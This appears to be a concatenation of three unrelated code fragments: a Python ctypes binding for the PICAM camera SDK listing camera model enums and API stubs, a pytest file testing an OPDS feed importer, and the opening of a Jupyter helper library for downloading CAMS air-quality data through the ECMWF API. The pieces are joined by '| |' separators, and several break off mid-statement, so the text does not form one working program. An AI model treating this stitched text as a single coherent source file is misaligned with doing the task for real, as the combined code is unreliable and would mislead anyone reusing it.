PicamModel_PixisXO2048B = 23,
PicamModel_PixisXF2048F = 25,
PicamModel_PixisXF2048B = 24,
#/* PIXIS 2K Series -------------------------------------------------------*/
PicamModel_Pixis2KSeries = 32,
PicamModel_Pixis2KF = 33,
PicamModel_Pixis2KB = 34,
PicamModel_Pixis2KBUV = 36,
PicamModel_Pixis2KBExcelon = 64,
PicamModel_PixisXO2KB = 35,
#/*------------------------------------------------------------------------*/
#/* Quad-RO Series (104) --------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_QuadroSeries = 100,
PicamModel_Quadro4096 = 101,
PicamModel_Quadro4096_2 = 103,
PicamModel_Quadro4320 = 102,
#/*------------------------------------------------------------------------*/
#/* ProEM Series (214) ----------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_ProEMSeries = 200,
#/* ProEM 512 Series ------------------------------------------------------*/
PicamModel_ProEM512Series = 203,
PicamModel_ProEM512B = 201,
PicamModel_ProEM512BK = 205,
PicamModel_ProEM512BExcelon = 204,
PicamModel_ProEM512BKExcelon = 206,
#/* ProEM 1024 Series -----------------------------------------------------*/
PicamModel_ProEM1024Series = 207,
PicamModel_ProEM1024B = 202,
PicamModel_ProEM1024BExcelon = 208,
#/* ProEM 1600 Series -----------------------------------------------------*/
PicamModel_ProEM1600Series = 209,
PicamModel_ProEM1600xx2B = 212,
PicamModel_ProEM1600xx2BExcelon = 210,
PicamModel_ProEM1600xx4B = 213,
PicamModel_ProEM1600xx4BExcelon = 211,
#/*------------------------------------------------------------------------*/
#/* ProEM+ Series (614) ---------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_ProEMPlusSeries = 600,
#/* ProEM+ 512 Series -----------------------------------------------------*/
PicamModel_ProEMPlus512Series = 603,
PicamModel_ProEMPlus512B = 601,
PicamModel_ProEMPlus512BK = 605,
PicamModel_ProEMPlus512BExcelon = 604,
PicamModel_ProEMPlus512BKExcelon = 606,
#/* ProEM+ 1024 Series ----------------------------------------------------*/
PicamModel_ProEMPlus1024Series = 607,
PicamModel_ProEMPlus1024B = 602,
PicamModel_ProEMPlus1024BExcelon = 608,
#/* ProEM+ 1600 Series ----------------------------------------------------*/
PicamModel_ProEMPlus1600Series = 609,
PicamModel_ProEMPlus1600xx2B = 612,
PicamModel_ProEMPlus1600xx2BExcelon = 610,
PicamModel_ProEMPlus1600xx4B = 613,
PicamModel_ProEMPlus1600xx4BExcelon = 611,
#/*------------------------------------------------------------------------*/
#/* ProEM-HS Series (1209) ------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_ProEMHSSeries = 1200,
#/* ProEM-HS 512 Series ---------------------------------------------------*/
PicamModel_ProEMHS512Series = 1201,
PicamModel_ProEMHS512B = 1202,
PicamModel_ProEMHS512BK = 1207,
PicamModel_ProEMHS512BExcelon = 1203,
PicamModel_ProEMHS512BKExcelon = 1208,
#/* ProEM-HS 1024 Series --------------------------------------------------*/
PicamModel_ProEMHS1024Series = 1204,
PicamModel_ProEMHS1024B = 1205,
PicamModel_ProEMHS1024BExcelon = 1206,
#/*------------------------------------------------------------------------*/
#/* PI-MAX3 Series (303) --------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PIMax3Series = 300,
PicamModel_PIMax31024I = 301,
PicamModel_PIMax31024x256 = 302,
#/*------------------------------------------------------------------------*/
#/* PI-MAX4 Series (721) --------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PIMax4Series = 700,
#/* PI-MAX4 1024i Series --------------------------------------------------*/
PicamModel_PIMax41024ISeries = 703,
PicamModel_PIMax41024I = 701,
PicamModel_PIMax41024IRF = 704,
#/* PI-MAX4 1024f Series --------------------------------------------------*/
PicamModel_PIMax41024FSeries = 710,
PicamModel_PIMax41024F = 711,
PicamModel_PIMax41024FRF = 712,
#/* PI-MAX4 1024x256 Series -----------------------------------------------*/
PicamModel_PIMax41024x256Series = 705,
PicamModel_PIMax41024x256 = 702,
PicamModel_PIMax41024x256RF = 706,
#/* PI-MAX4 2048 Series ---------------------------------------------------*/
PicamModel_PIMax42048Series = 716,
PicamModel_PIMax42048F = 717,
PicamModel_PIMax42048B = 718,
PicamModel_PIMax42048FRF = 719,
PicamModel_PIMax42048BRF = 720,
#/* PI-MAX4 512EM Series --------------------------------------------------*/
PicamModel_PIMax4512EMSeries = 708,
PicamModel_PIMax4512EM = 707,
PicamModel_PIMax4512BEM = 709,
#/* PI-MAX4 1024EM Series -------------------------------------------------*/
PicamModel_PIMax41024EMSeries = 713,
PicamModel_PIMax41024EM = 715,
PicamModel_PIMax41024BEM = 714,
#/*------------------------------------------------------------------------*/
#/* PyLoN Series (439) ----------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PylonSeries = 400,
#/* PyLoN 100 Series ------------------------------------------------------*/
PicamModel_Pylon100Series = 418,
PicamModel_Pylon100F = 404,
PicamModel_Pylon100B = 401,
PicamModel_Pylon100BR = 407,
PicamModel_Pylon100BExcelon = 425,
PicamModel_Pylon100BRExcelon = 426,
#/* PyLoN 256 Series ------------------------------------------------------*/
PicamModel_Pylon256Series = 419,
PicamModel_Pylon256F = 409,
PicamModel_Pylon256B = 410,
PicamModel_Pylon256E = 411,
PicamModel_Pylon256BR = 412,
#/* PyLoN 400 Series ------------------------------------------------------*/
PicamModel_Pylon400Series = 420,
PicamModel_Pylon400F = 405,
PicamModel_Pylon400B = 402,
PicamModel_Pylon400BR = 408,
PicamModel_Pylon400BExcelon = 427,
PicamModel_Pylon400BRExcelon = 428,
#/* PyLoN 1024 Series -----------------------------------------------------*/
PicamModel_Pylon1024Series = 421,
PicamModel_Pylon1024B = 417,
PicamModel_Pylon1024BExcelon = 429,
#/* PyLoN 1300 Series -----------------------------------------------------*/
PicamModel_Pylon1300Series = 422,
PicamModel_Pylon1300F = 406,
PicamModel_Pylon1300B = 403,
PicamModel_Pylon1300R = 438,
PicamModel_Pylon1300BR = 432,
PicamModel_Pylon1300BExcelon = 430,
PicamModel_Pylon1300BRExcelon = 433,
#/* PyLoN 2048 Series -----------------------------------------------------*/
PicamModel_Pylon2048Series = 423,
PicamModel_Pylon2048F = 415,
PicamModel_Pylon2048B = 434,
PicamModel_Pylon2048BR = 416,
PicamModel_Pylon2048BExcelon = 435,
PicamModel_Pylon2048BRExcelon = 436,
#/* PyLoN 2K Series -------------------------------------------------------*/
PicamModel_Pylon2KSeries = 424,
PicamModel_Pylon2KF = 413,
PicamModel_Pylon2KB = 414,
PicamModel_Pylon2KBUV = 437,
PicamModel_Pylon2KBExcelon = 431,
#/*------------------------------------------------------------------------*/
#/* PyLoN-IR Series (904) -------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PylonirSeries = 900,
#/* PyLoN-IR 1024 Series --------------------------------------------------*/
PicamModel_Pylonir1024Series = 901,
PicamModel_Pylonir102422 = 902,
PicamModel_Pylonir102417 = 903,
#/*------------------------------------------------------------------------*/
#/* PIoNIR Series (502) ---------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PionirSeries = 500,
PicamModel_Pionir640 = 501,
#/*------------------------------------------------------------------------*/
#/* NIRvana Series (802) --------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_NirvanaSeries = 800,
PicamModel_Nirvana640 = 801,
#/*------------------------------------------------------------------------*/
#/* NIRvana ST Series (1302) ----------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_NirvanaSTSeries = 1300,
PicamModel_NirvanaST640 = 1301,
#/*------------------------------------------------------------------------*/
#/* NIRvana-LN Series (1102) ----------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_NirvanaLNSeries = 1100,
PicamModel_NirvanaLN640 = 1101
#/*------------------------------------------------------------------------*/
))
"""
/*----------------------------------------------------------------------------*/
typedef enum PicamComputerInterface
{
PicamComputerInterface_Usb2 = 1,
PicamComputerInterface_1394A = 2,
PicamComputerInterface_GigabitEthernet = 3
} PicamComputerInterface; /* (4) */
"""
PicamComputerInterfaceEnum = PI_Enum(
"PicamComputerInterface", dict(
PicamComputerInterface_Usb2 = 1,
PicamComputerInterface_1394A = 2,
PicamComputerInterface_GigabitEthernet = 3
))
"""/*----------------------------------------------------------------------------*/
typedef enum PicamStringSize
{
PicamStringSize_SensorName = 64,
PicamStringSize_SerialNumber = 64,
PicamStringSize_FirmwareName = 64,
PicamStringSize_FirmwareDetail = 256
} PicamStringSize;
"""
PicamStringSizeEnum = PI_Enum(
"PicamStringSize", dict(
PicamStringSize_SensorName = 64,
PicamStringSize_SerialNumber = 64,
PicamStringSize_FirmwareName = 64,
PicamStringSize_FirmwareDetail = 256
))
"""
/*----------------------------------------------------------------------------*/
typedef struct PicamCameraID
{
PicamModel model;
PicamComputerInterface computer_interface;
pichar sensor_name[PicamStringSize_SensorName];
pichar serial_number[PicamStringSize_SerialNumber];
} PicamCameraID;
"""
class PicamCameraID(ctypes.Structure):
_fields_ = [("model", ctypes.c_int),
("PicamComputerInterface", ctypes.c_int),
("sensor_name", pichar * PicamStringSizeEnum.bysname['SensorName']),
("serial_number", pichar * PicamStringSizeEnum.bysname['SerialNumber'])
]
"""
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyCameraIDs( const PicamCameraID* id_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetAvailableCameraIDs(
const PicamCameraID** id_array,
piint* id_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetUnavailableCameraIDs(
const PicamCameraID** id_array,
piint* id_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraIDConnected(
const PicamCameraID* id,
pibln* connected );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraIDOpenElsewhere(
const PicamCameraID* id,
pibln* open_elsewhere );
/*----------------------------------------------------------------------------*/
/* Camera Access -------------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef void* PicamHandle;
"""
PicamHandle = ctypes.c_void_p
"""
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyHandles( const PicamHandle* handle_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_OpenFirstCamera( PicamHandle* camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_OpenCamera(
const PicamCameraID* id,
PicamHandle* camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_CloseCamera( PicamHandle camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetOpenCameras(
const PicamHandle** camera_array,
piint* camera_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraConnected(
PicamHandle camera,
pibln* connected );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetCameraID(
PicamHandle camera,
PicamCameraID* id );
/*----------------------------------------------------------------------------*/
/* Camera Information --------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef struct PicamFirmwareDetail
{
pichar name[PicamStringSize_FirmwareName];
pichar detail[PicamStringSize_FirmwareDetail];
} PicamFirmwareDetail;
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyFirmwareDetails(
const PicamFirmwareDetail* firmware_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetFirmwareDetails(
const PicamCameraID* id,
const PicamFirmwareDetail** firmware_array,
piint* firmware_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
/* Demo Camera ---------------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyModels( const PicamModel* model_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetAvailableDemoCameraModels(
const PicamModel** model_array,
piint* model_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_ConnectDemoCamera(
PicamModel model,
const pichar* serial_number,
PicamCameraID* id );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DisconnectDemoCamera( const PicamCameraID* id );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsDemoCamera(
const PicamCameraID* id,
pibln* demo );
/*----------------------------------------------------------------------------*/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/* Camera Parameter Values, Information, Constraints and Commitment */
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/*----------------------------------------------------------------------------*/
/* Camera Parameters ---------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef enum PicamValueType
{
/*------------------------------------------------------------------------*/
/* Integral Types --------------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Integer = 1,
PicamValueType_Boolean = 3,
PicamValueType_Enumeration = 4,
/*------------------------------------------------------------------------*/
/* Large Integral Type ---------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_LargeInteger = 6,
/*------------------------------------------------------------------------*/
/* Floating Point Type ---------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_FloatingPoint = 2,
/*------------------------------------------------------------------------*/
/* Regions of Interest Type ----------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Rois = 5,
/*------------------------------------------------------------------------*/
/* Pulse Type ------------------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Pulse = 7,
/*------------------------------------------------------------------------*/
/* Custom Intensifier Modulation Sequence Type ---------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Modulations = 8
/*------------------------------------------------------------------------*/
} PicamValueType; /* (9) */
"""
PicamValueTypeEnum = PI_Enum(
"PicamValueType", dict(
#/*------------------------------------------------------------------------*/
#/* Integral Types --------------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamValueType_Integer = 1,
PicamValueType_Boolean = 3,
PicamValueType_Enumeration = 4,
#/*------------------------------------------------------------------------*/
#/* Large | |
in a
# <simplified:message> tag in unrecognized_identifier.opds.
key = "http://www.gutenberg.org/ebooks/100"
assert [key] == list(failures.keys())
failure = failures[key]
assert "404: I've never heard of this work." == failure.exception
assert key == failure.obj.urn
def test_extract_messages(self):
parser = OPDSXMLParser()
feed = self.sample_opds("unrecognized_identifier.opds")
root = etree.parse(StringIO(feed))
[message] = OPDSImporter.extract_messages(parser, root)
assert "urn:librarysimplified.org/terms/id/Gutenberg ID/100" == message.urn
assert 404 == message.status_code
assert "I've never heard of this work." == message.message
def test_extract_medium(self):
m = OPDSImporter.extract_medium
# No tag -- the default is used.
assert "Default" == m(None, "Default")
def medium(additional_type, format, default="Default"):
# Make an <atom:entry> tag with the given tags.
# Parse it and call extract_medium on it.
entry = '<entry xmlns:schema="http://schema.org/" xmlns:dcterms="http://purl.org/dc/terms/"'
if additional_type:
entry += ' schema:additionalType="%s"' % additional_type
entry += ">"
if format:
entry += "<dcterms:format>%s</dcterms:format>" % format
entry += "</entry>"
tag = etree.parse(StringIO(entry))
return m(tag.getroot(), default=default)
audio_type = random.choice(MediaTypes.AUDIOBOOK_MEDIA_TYPES) + ";param=value"
ebook_type = random.choice(MediaTypes.BOOK_MEDIA_TYPES) + ";param=value"
# schema:additionalType is checked first. If present, any
# potentially contradictory information in dcterms:format is
# ignored.
assert Edition.AUDIO_MEDIUM == medium(
"http://bib.schema.org/Audiobook", ebook_type
)
assert Edition.BOOK_MEDIUM == medium("http://schema.org/EBook", audio_type)
# When schema:additionalType is missing or not useful, the
# value of dcterms:format is mapped to a medium using
# Edition.medium_from_media_type.
assert Edition.AUDIO_MEDIUM == medium("something-else", audio_type)
assert Edition.BOOK_MEDIUM == medium(None, ebook_type)
# If both pieces of information are missing or useless, the
# default is used.
assert "Default" == medium(None, None)
assert "Default" == medium("something-else", "image/jpeg")
def test_handle_failure(self):
axis_id = self._identifier(identifier_type=Identifier.AXIS_360_ID)
axis_isbn = self._identifier(Identifier.ISBN, "9781453219539")
identifier_mapping = {axis_isbn: axis_id}
importer = OPDSImporter(
self._db,
collection=None,
data_source_name=DataSource.OA_CONTENT_SERVER,
identifier_mapping=identifier_mapping,
)
# The simplest case -- an identifier associated with a
# CoverageFailure. The Identifier and CoverageFailure are
# returned as-is.
input_failure = CoverageFailure(object(), "exception")
urn = "urn:isbn:9781449358068"
expect_identifier, ignore = Identifier.parse_urn(self._db, urn)
identifier, output_failure = importer.handle_failure(urn, input_failure)
assert expect_identifier == identifier
assert input_failure == output_failure
# A normal OPDSImporter would consider this a failure, but
# because the 'failure' is an Identifier, not a
# CoverageFailure, we're going to treat it as a success.
identifier, not_a_failure = importer.handle_failure(
"urn:isbn:9781449358068", self._identifier()
)
assert expect_identifier == identifier
assert identifier == not_a_failure
# Note that the 'failure' object retuned is the Identifier that
# was passed in, not the Identifier that substituted as the 'failure'.
# (In real usage, though, they should be the same.)
# An identifier that maps to some other identifier,
# associated with a CoverageFailure.
identifier, output_failure = importer.handle_failure(
axis_isbn.urn, input_failure
)
assert axis_id == identifier
assert input_failure == output_failure
# An identifier that maps to some other identifier,
# in a scenario where what OPDSImporter considers failure
# is considered success.
identifier, not_a_failure = importer.handle_failure(
axis_isbn.urn, self._identifier()
)
assert axis_id == identifier
assert axis_id == not_a_failure
def test_coveragefailure_from_message(self):
"""Test all the different ways a <simplified:message> tag might
become a CoverageFailure.
"""
data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
def f(*args):
message = OPDSMessage(*args)
return OPDSImporter.coveragefailure_from_message(data_source, message)
# If the URN is invalid we can't create a CoverageFailure.
invalid_urn = f("urnblah", "500", "description")
assert invalid_urn == None
identifier = self._identifier()
# If the 'message' is that everything is fine, no CoverageFailure
# is created.
this_is_fine = f(identifier.urn, "200", "description")
assert None == this_is_fine
# Test the various ways the status code and message might be
# transformed into CoverageFailure.exception.
description_and_status_code = f(identifier.urn, "404", "description")
assert "404: description" == description_and_status_code.exception
assert identifier == description_and_status_code.obj
description_only = f(identifier.urn, None, "description")
assert "description" == description_only.exception
status_code_only = f(identifier.urn, "404", None)
assert "404" == status_code_only.exception
no_information = f(identifier.urn, None, None)
assert "No detail provided." == no_information.exception
def test_coveragefailure_from_message_with_success_status_codes(self):
"""When an OPDSImporter defines SUCCESS_STATUS_CODES, messages with
those status codes are always treated as successes.
"""
class Mock(OPDSImporter):
SUCCESS_STATUS_CODES = [200, 999]
data_source = DataSource.lookup(self._db, DataSource.OVERDRIVE)
def f(*args):
message = OPDSMessage(*args)
return Mock.coveragefailure_from_message(data_source, message)
identifier = self._identifier()
# If the status code is 999, then the identifier is returned
# instead of a CoverageFailure -- we know that 999 means
# coverage was in fact provided.
failure = f(identifier.urn, "999", "hooray!")
assert identifier == failure
# If the status code is 200, then the identifier is returned
# instead of None.
failure = f(identifier.urn, "200", "ok!")
assert identifier == failure
# If the status code is anything else, a CoverageFailure
# is returned.
failure = f(identifier.urn, 500, "hooray???")
assert isinstance(failure, CoverageFailure)
assert "500: hooray???" == failure.exception
def test_extract_metadata_from_elementtree_handles_messages_that_become_identifiers(
self,
):
not_a_failure = self._identifier()
class MockOPDSImporter(OPDSImporter):
@classmethod
def coveragefailures_from_messages(
cls, data_source, message, success_on_200=False
):
"""No matter what input we get, we act as though there were
a single simplified:message tag in the OPDS feed, which we
decided to treat as success rather than failure.
"""
return [not_a_failure]
data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
values, failures = MockOPDSImporter.extract_metadata_from_elementtree(
self.content_server_mini_feed, data_source
)
assert {not_a_failure.urn: not_a_failure} == failures
def test_extract_metadata_from_elementtree_handles_exception(self):
class DoomedElementtreeOPDSImporter(OPDSImporter):
"""An importer that can't extract metadata from elementttree."""
@classmethod
def _detail_for_elementtree_entry(cls, *args, **kwargs):
raise Exception("Utter failure!")
data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
(
values,
failures,
) = DoomedElementtreeOPDSImporter.extract_metadata_from_elementtree(
self.content_server_mini_feed, data_source
)
# No metadata was extracted.
assert 0 == len(list(values.keys()))
# There are 3 CoverageFailures - every <entry> threw an
# exception and the <simplified:message> indicated failure.
assert 3 == len(failures)
# The entry with the 202 message became an appropriate
# CoverageFailure because its data was not extracted through
# extract_metadata_from_elementtree.
failure = failures["http://www.gutenberg.org/ebooks/1984"]
assert isinstance(failure, CoverageFailure)
assert True == failure.transient
assert failure.exception.startswith("202")
assert "Utter failure!" not in failure.exception
# The other entries became generic CoverageFailures due to the failure
# of extract_metadata_from_elementtree.
failure = failures["urn:librarysimplified.org/terms/id/Gutenberg%20ID/10441"]
assert isinstance(failure, CoverageFailure)
assert True == failure.transient
assert "Utter failure!" in failure.exception
failure = failures["urn:librarysimplified.org/terms/id/Gutenberg%20ID/10557"]
assert isinstance(failure, CoverageFailure)
assert True == failure.transient
assert "Utter failure!" in failure.exception
def test_import_exception_if_unable_to_parse_feed(self):
feed = "I am not a feed."
importer = OPDSImporter(self._db, collection=None)
pytest.raises(etree.XMLSyntaxError, importer.import_from_feed, feed)
def test_import(self):
feed = self.content_server_mini_feed
imported_editions, pools, works, failures = OPDSImporter(
self._db, collection=None
).import_from_feed(feed)
[crow, mouse] = sorted(imported_editions, key=lambda x: x.title)
# By default, this feed is treated as though it came from the
# metadata wrangler. No Work has been created.
assert DataSource.METADATA_WRANGLER == crow.data_source.name
assert None == crow.work
assert [] == crow.license_pools
assert Edition.BOOK_MEDIUM == crow.medium
# not even the 'mouse'
assert None == mouse.work
assert Edition.PERIODICAL_MEDIUM == mouse.medium
# Three links have been added to the identifier of the 'mouse'
# edition.
image, thumbnail, description = sorted(
mouse.primary_identifier.links, key=lambda x: x.rel
)
# A Representation was imported for the summary with known
# content.
description_rep = description.resource.representation
assert b"This is a summary!" == description_rep.content
assert Representation.TEXT_PLAIN == description_rep.media_type
# A Representation was imported for the image with a media type
# inferred from its URL.
image_rep = image.resource.representation
assert image_rep.url.endswith("_9.png")
assert Representation.PNG_MEDIA_TYPE == image_rep.media_type
# The thumbnail was imported similarly, and its representation
# was marked as a thumbnail of the full-sized image.
thumbnail_rep = thumbnail.resource.representation
assert Representation.PNG_MEDIA_TYPE == thumbnail_rep.media_type
assert image_rep == thumbnail_rep.thumbnail_of
# Two links were added to the identifier of the 'crow' edition.
[broken_image, working_image] = sorted(
crow.primary_identifier.links, key=lambda x: x.resource.url
)
# Because these images did not have a specified media type or a
# distinctive extension, and we have not actually retrieved
# the URLs yet, we were not able to determine their media type,
# so they have no associated Representation.
assert broken_image.resource.url.endswith("/broken-cover-image")
assert working_image.resource.url.endswith("/working-cover-image")
assert None == broken_image.resource.representation
assert None == working_image.resource.representation
# Three measurements have been added to the 'mouse' edition.
popularity, quality, rating = sorted(
[x for x in mouse.primary_identifier.measurements if x.is_most_recent],
key=lambda x: x.quantity_measured,
)
assert DataSource.METADATA_WRANGLER == popularity.data_source.name
assert Measurement.POPULARITY == popularity.quantity_measured
assert 0.25 == popularity.value
assert DataSource.METADATA_WRANGLER == quality.data_source.name
assert Measurement.QUALITY == quality.quantity_measured
assert 0.3333 == quality.value
assert DataSource.METADATA_WRANGLER == rating.data_source.name
assert Measurement.RATING == rating.quantity_measured
assert 0.6 == rating.value
seven, children, courtship, fantasy, pz, magic, new_york = sorted(
mouse.primary_identifier.classifications, key=lambda x: x.subject.name
)
pz_s = pz.subject
assert "Juvenile Fiction" == pz_s.name
assert "PZ" == pz_s.identifier
new_york_s = new_york.subject
assert "New York (N.Y.) -- Fiction" == new_york_s.name
assert "sh2008108377" | |
<reponame>VincentSaleh/Mundi_NotebookUsage<filename>lib/internal_lib/camslib.py
#!/usr/bin/python
# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2019 Mundi Web Services
# Licensed under the 3-Clause BSD License; you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# https://opensource.org/licenses/BSD-3-Clause
#
# Author : <NAME> / <NAME>
#
# Contact email: <EMAIL>
# =============================================================================
import datetime
import matplotlib.colors as colors
import matplotlib.pyplot as plt
import numpy as np
import os
from datetime import timedelta
from matplotlib.colors import ListedColormap
from matplotlib.pyplot import figure
os.environ["PROJ_LIB"] = r"/opt/conda/share/proj"
from mpl_toolkits.basemap import Basemap
from PIL import Image
import string
import requests
import ipywidgets as widgets
from IPython.display import display, clear_output
from owslib.wcs import WebCoverageService
from owslib.wms import WebMapService
from ecmwfapi import ECMWFDataServer
import ecmwfapi
from IPython.display import Image
import glob
from IPython.display import clear_output, HTML, Image
from PIL import Image, ImageDraw, ImageFont, ImageOps
import pygrib
import imageio
from tqdm import tqdm
from os import path
server_url = "https://geoservices.regional.atmosphere.copernicus.eu/services/"
dlserver = "https://download.regional.atmosphere.copernicus.eu/services/CAMS50?"
methods = ["FORECAST", "ANALYSIS"]
pollens = ["BIRCHPOLLEN", "OLIVEPOLLEN", "GRASSPOLLEN", "RAGWEEDPOLLEN"]
species = ["O3", "CO", "NH3", "NO", "NO2", "NMVOC", "PANs", "PM10", "PM2.5", "SO2" ] + pollens
models = ["ENSEMBLE", "CHIMERE", "EMEP", "EURAD", "LOTOSEUROS", "MATCH", "MOCAGE", "SILAM"]
levels = [0, 50, 250, 500, 1000, 2000, 3000, 5000]
dict_projection_map = ["WORLD","AFRICA", "ASIA", "EUROPE","NORTH-AMERICA","NORTH-POLE", "OCEANIA", "SOUTH-AMERICA","SOUTH-POLE"]
dict_color_map = ['ocean', 'gist_earth', 'terrain', 'gist_stern','gnuplot', 'gnuplot2',
'CMRmap', 'brg','hsv', 'jet', 'nipy_spectral', 'gist_ncar', 'tab20b', 'tab20c']
color_display_direction = ["Left to right", "Right to left"]
data_parameters = ["Nitrogen dioxyde", "Ozone", "Sulfur dioxyde", "Particulate Matter <2.5 um", "Particulate Matter <10 um" ]
SAVE_FOLDER_IMAGES = "/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"
SAVE_FOLDER_GIF = "/home/jovyan/work/cams_data/cams_ecmwfapi/"
# ----------------------------------------------------------------
# CAMS ECMWFAPI notebook functions:
# ----------------------------------------------------------------
def setup_dir():
"""This function gets the destination folder path"""
output_dir = path.join(os.environ['HOME'], 'work/cams_data/cams_ecmwfapi/images_data/')
return output_dir
def setup(output_dir):
"""This function creates the folder output_dir if it doesn't exist"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_filename = path.join(output_dir, 'output.grib')
return output_filename
def configure_ecmwfapi():
"""This function allows to log onto the ecmwfapi service"""
ecmwfapi_email_widget = widgets.Text(
value='',
placeholder='Enter your email to log in ECMWF',
description='Your Email',
disabled=False
)
ecmwfapi_key_widget = widgets.Text(
value='',
placeholder='Enter your ECMWF Key',
description='Your Key',
disabled=False
)
button_widget = widgets.Button(
description='Validate',
disabled=False,
button_style='',
tooltip='Click me',
)
output_widget = widgets.Output(
)
display(ecmwfapi_email_widget)
display(ecmwfapi_key_widget)
display(button_widget)
display(output_widget)
def click_configure_ecmwfapi(b):
with output_widget:
ecmwf_email = ecmwfapi_email_widget.value
ecmwf_key = ecmwfapi_key_widget.value
print('Your ECMWF login email is : ' + ecmwf_email + ', and your ECMWF Key is : ' + ecmwf_key)
content = f'{{\n "url" : "https://api.ecmwf.int/v1",\n "key" : "{ecmwf_key}",\n "email" : "{ecmwf_email}"\n}}'
# write content to $HOME/.ecmwfapirc
with open(path.join(os.environ["HOME"], '.ecmwfapirc'), 'w') as f:
f.write(content)
button_widget.on_click(click_configure_ecmwfapi)
def request_ecmwfapi(output_filename):
"""This function creates a request to the ECMWFAPI service with parameters asked in the GUI
and generates the output.grib file containing resulting data.
Parameters
----------
output_filename: string
folder where the output.grib file will be stored
"""
data_parameter_widget = widgets.Dropdown(
options=data_parameters,
description='Data selection',
)
start_date_widget = widgets.DatePicker(
description='Starting Date',
value=datetime.date.today() - datetime.timedelta(45),
disabled=False
)
current_date_widget = widgets.DatePicker(
description='Final date',
value=datetime.date.today() - datetime.timedelta(15),
disabled=False)
hour_06 = widgets.Checkbox(
value=False,
description='06:00:00',
disabled=False,
indent=True
)
hour_12 = widgets.Checkbox(
value=False,
description='12:00:00',
disabled=False,
indent=True
)
hour_18 = widgets.Checkbox(
value=False,
description='18:00:00',
disabled=False,
indent=True
)
label_hour = widgets.VBox([widgets.Label(value="Select one or many hours below :"), hour_06, hour_12, hour_18])
button = widgets.Button(description='Validate')
out = widgets.Output()
display(data_parameter_widget)
display(start_date_widget)
display(current_date_widget)
display(label_hour)
display(button)
display(out)
def click_ecmwfapi_request(b):
with out:
time_6 = ""
time_12 = ""
time_18 = ""
if hour_06.value == True:
time_6 = "/06:00:00"
if hour_12.value == True:
time_12 = "/12:00:00"
if hour_18.value == True:
time_18 = "/18:00:00"
time_param = time_6 + time_12 + time_18
server = ecmwfapi.ECMWFDataServer()
server.retrieve({
"class": "mc",
"dataset": "cams_nrealtime",
"date": str(start_date_widget.value) + "/to/" + str(current_date_widget.value),
"expver": "0001",
"levtype": "sfc",
"param": parameter_value(data_parameter_widget.value),
"step": "0",
"stream": "oper",
"time": "00:00:00" + time_param,
"type": "an",
"target": output_filename,
})
button.on_click(click_ecmwfapi_request)
def parameter_value(atmosphere_data_parameter):
"""This function returns the parameter value corresponding to the athmosphere gaz value selected in the GUI.
Parameters
----------
atmosphere_data_parameter: string
Atmosphere data parameter selected.
Returns
-------
data_param: string
The data parameter value used in the ECMWFAPI request
"""
if atmosphere_data_parameter == "Nitrogen dioxyde":
data_param = "125.210"
elif atmosphere_data_parameter == "Ozone":
data_param = "206.210"
elif atmosphere_data_parameter == "Sulfur dioxyde":
data_param = "126.210"
elif atmosphere_data_parameter == "Particulate Matter <2.5 um":
data_param = "73.210"
elif atmosphere_data_parameter == "Particulate Matter <10 um":
data_param = "74.210"
return data_param
def get_projection_map(output_dir, output_filename):
""" This function allows to define what kind of projection map the user wants to display data
Parameters
----------
output_dir: string
folder where output.grib and img are stored.
output_filename : string
output.grib location
"""
projection_widget = widgets.Dropdown(
